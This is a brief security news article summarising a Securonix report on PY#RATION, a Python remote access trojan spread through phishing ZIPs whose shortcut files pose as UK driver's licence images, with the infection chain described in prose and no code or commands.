Cybersecurity researchers have unearthed a new attack campaign that leverages a Python-based remote access trojan (RAT) to gain control over compromised systems since at least August 2022.
“This malware is unique in its utilization of WebSockets to avoid detection and for both command-and-control (C2) communication and exfiltration,” Securonix said in a report shared with The Hacker News.
The malware, dubbed PY#RATION by the cybersecurity firm, comes with a host of capabilities that allows the threat actor to harvest sensitive information. Later versions of the backdoor also sport anti-evasion techniques, suggesting that it’s being actively developed and maintained.
The attack commences with a phishing email containing a ZIP archive, which, in turn, harbours two shortcut (.LNK) files that masquerade as front and back side images of a seemingly legitimate U.K. driver’s license.
Opening each of the .LNK files retrieves two text files from a remote server that are subsequently renamed to .BAT files and executed stealthily in background, while the decoy image is displayed to the victim.
Also downloaded from a C2 server is another batch script that’s engineered to retrieve additional payloads from the server, including the Python binary (“CortanaAssistance.exe”). The choice of using Cortana, Microsoft’s virtual assistant, indicates an attempt to pass off the malware as a system file.
images from Hacker News
Recent Comments